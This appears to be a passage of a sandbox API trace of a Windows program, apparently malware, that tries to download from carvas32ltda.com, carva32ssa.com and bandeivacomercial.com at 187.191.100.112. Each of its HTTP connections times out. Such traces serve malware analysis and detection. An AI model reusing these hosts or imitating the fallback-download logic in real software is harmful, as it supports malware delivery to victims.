(Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0049.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="carvas32ltda.com", cchCount2=16) returned 1 [0049.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0049.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff381, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û\x09", lpUsedDefaultChar=0x0) returned 0 [0049.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0049.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x71d1864, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6 [0049.795] GetProcAddress (hModule=0x773f0000, lpProcName="socket") returned 0x773f3eb8 [0049.795] socket (af=2, type=1, protocol=0) returned 0x944 [0049.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0049.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockopt", cchWideChar=10, lpMultiByteStr=0x71ca31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockopt", lpUsedDefaultChar=0x0) returned 10 [0049.803] GetProcAddress (hModule=0x773f0000, lpProcName="getsockopt") returned 0x773f737d [0049.803] getsockopt (in: s=0x944, level=65535, optname=4104, optval=0x68ff448, optlen=0x68ff444 | out: optval="\x01", optlen=0x68ff444) returned 0 [0049.803] getsockopt (in: s=0x944, level=6, optname=1, optval=0x68ff448, optlen=0x68ff444 | out: optval="", optlen=0x68ff444) returned 0 [0049.803] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0049.803] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x71ca31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10 [0049.804] GetProcAddress (hModule=0x773f0000, lpProcName="setsockopt") returned 0x773f41b6 [0049.804] setsockopt (s=0x944, level=65535, optname=4, optval="", optlen=4) returned 0 [0049.804] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0049.804] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x71d1864, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5 [0049.805] GetProcAddress (hModule=0x773f0000, lpProcName="htons") returned 0x773f2d8b [0049.805] htons (hostshort=0x0) returned 0x0 [0049.805] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="bind", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0049.805] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="bind", cchWideChar=4, lpMultiByteStr=0x71d1864, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bind", lpUsedDefaultChar=0x0) returned 4 [0049.805] GetProcAddress (hModule=0x773f0000, lpProcName="bind") returned 0x773f4582 [0049.805] bind (s=0x944, addr=0x68ff3a8*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0049.805] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0049.805] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x71ca31c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11 [0049.806] GetProcAddress (hModule=0x773f0000, lpProcName="getsockname") returned 0x773f30af [0049.806] getsockname (in: s=0x944, name=0x68ff39c, namelen=0x68ff41c | out: name=0x68ff39c*(sa_family=2, sin_port=0xc008, sin_addr="0.0.0.0"), namelen=0x68ff41c) returned 0 [0049.806] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0049.806] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x71d1864, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5 [0049.806] GetProcAddress (hModule=0x773f0000, lpProcName="ntohs") returned 0x773f2d8b [0049.807] htons (hostshort=0x8c0) returned 0xc008 [0049.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carvas32ltda.com", cchCount1=16, lpString2="LOCALHOST", cchCount2=9) returned 1 [0049.807] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carvas32ltda.com", cchUnicodeChar=16, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 16 [0049.807] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carvas32ltda.com", cchUnicodeChar=16, lpASCIICharStr=0x71fc454, cchASCIIChar=16 | out: lpASCIICharStr="carvas32ltda.com") returned 16 [0049.807] GetAddrInfoW (in: pNodeName="carvas32ltda.com", pServiceName=0x0, pHints=0x68ff450, ppResult=0x68ff470 | out: ppResult=0x68ff470) returned 0 [0049.871] FreeAddrInfoW (pAddrInfo=0x54d26a0) [0049.871] htons (hostshort=0x50) returned 0x5000 [0049.871] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0049.871] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x71d1864, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7 [0049.872] GetProcAddress (hModule=0x773f0000, lpProcName="connect") returned 0x773f6bdd [0049.872] connect (s=0x944, name=0x68ff400*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0070.911] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0070.912] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x71ca3bc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAGetLastError", lpUsedDefaultChar=0x0) returned 15 [0070.912] GetProcAddress (hModule=0x773f0000, lpProcName="WSAGetLastError") returned 0x773f37ad [0070.912] WSAGetLastError () returned 10060 [0070.913] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeaa, lpBuffer=0x68fd32c, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0070.913] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeca, lpBuffer=0x68fd328, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0070.913] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x68ff390) [0070.913] RtlUnwind (TargetFrame=0x68ff4dc, TargetIp=0x6ba8130, ExceptionRecord=0x68feeac, ReturnValue=0x0) [0070.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="shutdown", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="shutdown", cchWideChar=8, lpMultiByteStr=0x71ca4fc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shutdown", lpUsedDefaultChar=0x0) returned 8 [0070.915] GetProcAddress (hModule=0x773f0000, lpProcName="shutdown") returned 0x773f449d [0070.915] shutdown (s=0x944, how=1) returned -1 [0070.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x71ca4fc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11 [0070.916] GetProcAddress (hModule=0x773f0000, lpProcName="closesocket") returned 0x773f3918 [0070.916] closesocket (s=0x944) returned 0 [0070.917] GetCurrentThreadId () returned 0xc04 [0070.917] GetCurrentThreadId () returned 0xc04 [0070.917] GetCurrentThreadId () returned 0xc04 [0070.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fec05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ì\x8f\x06\x98\x0cK\x05¬ì\x8f\x06\"ú%wòp%wèù%w\x09±¢qü¤\x1c\x07", lpUsedDefaultChar=0x0) returned 0 [0070.917] GetCurrentThreadId () returned 0xc04 [0070.917] GetCurrentThreadId () returned 0xc04 [0070.917] GetCurrentThreadId () returned 0xc04 [0070.919] RtlUnwind (TargetFrame=0x68ff658, TargetIp=0x6ba8130, ExceptionRecord=0x68feeac, ReturnValue=0x0) [0070.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0070.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0070.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0070.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0070.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0070.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0070.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0070.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0070.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carvas32ltda.com", cchCount1=16, lpString2="carva32ssa.com", cchCount2=14) returned 3 [0070.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0070.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68feabd, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û\x09", lpUsedDefaultChar=0x0) returned 0 [0070.924] socket (af=2, type=1, protocol=0) returned 0x944 [0070.925] getsockopt (in: s=0x944, level=65535, optname=4104, optval=0x68feb84, optlen=0x68feb80 | out: optval="\x01", optlen=0x68feb80) returned 0 [0070.925] getsockopt (in: s=0x944, level=6, optname=1, optval=0x68feb84, optlen=0x68feb80 | out: optval="", optlen=0x68feb80) returned 0 [0070.925] setsockopt (s=0x944, level=65535, optname=4, optval="", optlen=4) returned 0 [0070.925] htons (hostshort=0x0) returned 0x0 [0070.925] bind (s=0x944, addr=0x68feae4*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0070.925] getsockname (in: s=0x944, name=0x68fead8, namelen=0x68feb58 | out: name=0x68fead8*(sa_family=2, sin_port=0xc009, sin_addr="0.0.0.0"), namelen=0x68feb58) returned 0 [0070.926] htons (hostshort=0x9c0) returned 0xc009 [0070.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carva32ssa.com", cchCount1=14, lpString2="LOCALHOST", cchCount2=9) returned 1 [0070.926] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carva32ssa.com", cchUnicodeChar=14, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 14 [0070.926] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carva32ssa.com", cchUnicodeChar=14, lpASCIICharStr=0x71e6f6c, cchASCIIChar=14 | out: lpASCIICharStr="carva32ssa.com") returned 14 [0070.926] GetAddrInfoW (in: pNodeName="carva32ssa.com", pServiceName=0x0, pHints=0x68feb8c, ppResult=0x68febac | out: ppResult=0x68febac) returned 0 [0070.980] FreeAddrInfoW (pAddrInfo=0x54a04d8) [0070.980] htons (hostshort=0x50) returned 0x5000 [0070.980] connect (s=0x944, name=0x68feb3c*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0092.021] WSAGetLastError () returned 10060 [0092.021] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeaa, lpBuffer=0x68fca68, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0092.021] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeca, lpBuffer=0x68fca64, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0092.022] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x68feacc) [0092.022] RtlUnwind (TargetFrame=0x68fec18, TargetIp=0x6ba8130, ExceptionRecord=0x68fe5ec, ReturnValue=0x0) [0092.023] shutdown (s=0x944, how=1) returned -1 [0092.023] closesocket (s=0x944) returned 0 [0092.024] GetCurrentThreadId () returned 0xc04 [0092.024] GetCurrentThreadId () returned 0xc04 [0092.024] GetCurrentThreadId () returned 0xc04 [0092.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fe345, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0092.024] GetCurrentThreadId () returned 0xc04 [0092.024] GetCurrentThreadId () returned 0xc04 [0092.024] GetCurrentThreadId () returned 0xc04 [0092.025] RtlUnwind (TargetFrame=0x68fed94, TargetIp=0x6ba8130, ExceptionRecord=0x68fe5ec, ReturnValue=0x0) [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0092.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carva32ssa.com", cchCount1=14, lpString2="bandeivacomercial.com", cchCount2=21) returned 3 [0092.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0092.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fe1fd, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û\x09", lpUsedDefaultChar=0x0) returned 0 [0092.030] socket (af=2, type=1, protocol=0) returned 0x944 [0092.030] getsockopt (in: s=0x944, level=65535, optname=4104, optval=0x68fe2c4, optlen=0x68fe2c0 | out: 